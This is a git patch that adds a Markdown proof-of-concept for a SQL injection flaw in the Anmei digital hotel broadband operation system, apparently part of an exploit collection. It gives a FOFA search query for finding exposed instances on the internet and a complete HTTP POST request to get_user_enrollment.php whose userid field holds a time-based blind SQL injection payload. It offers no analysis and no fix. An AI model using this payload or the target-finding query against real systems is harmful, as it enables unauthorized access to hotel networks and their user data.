From 790ec058bbcd3b8bc66df87a090d37977b0293d1 Mon Sep 17 00:00:00 2001
From: Nexolanta <73454853+Nexolanta@users.noreply.github.com>
Date: Sat, 8 Mar 2025 22:21:18 +0800
Subject: [PATCH] =?UTF-8?q?Update=20=E5=AE=89=E7=BE=8E=E6=95=B0=E5=AD=97?=
 =?UTF-8?q?=E9=85=92=E5=BA=97=E5=AE=BD=E5=B8=A6=E8=BF=90=E8=90=A5=E7=B3=BB?=
 =?UTF-8?q?=E7=BB=9Fget=5Fuser=5Fenrollment.php=E6=B3=A8=E5=85=A5=E6=BC=8F?=
 =?UTF-8?q?=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...��数字酒店宽带运营系统get_user_enrollment.php注入漏洞.md | 22 +++++++++++++++++++
 1 file changed, 22 insertions(+)

diff --git a/wpoc/安美数字酒店宽带运营系统/安美数字酒店宽带运营系统get_user_enrollment.php注入漏洞.md b/wpoc/安美数字酒店宽带运营系统/安美数字酒店宽带运营系统get_user_enrollment.php注入漏洞.md
index 8b13789..7eb37bd 100644
--- a/wpoc/安美数字酒店宽带运营系统/安美数字酒店宽带运营系统get_user_enrollment.php注入漏洞.md
+++ b/wpoc/安美数字酒店宽带运营系统/安美数字酒店宽带运营系统get_user_enrollment.php注入漏洞.md
@@ -1 +1,23 @@
+## 安美数字酒店宽带运营系统get_user_enrollment.php注入漏洞
 
+
+## fofa
+```
+title=酒店宽带运营系统
+```
+
+## POC
+```
+POST /user/get_user_enrollment.php HTTP/1.1
+Host: 127.0.0.1
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Cookie: PHPSESSID=3n9dv7r0vl6fcvirnlvp2oh1t4; dashboroad=srgua4gv7d2jnichvtl66l1146
+Content-Length: 263
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Encoding: gzip,deflate,br
+User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)
+Connection: Keep-alive
+
+userid=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z&usermac=1&portaltype=&portalname=
+```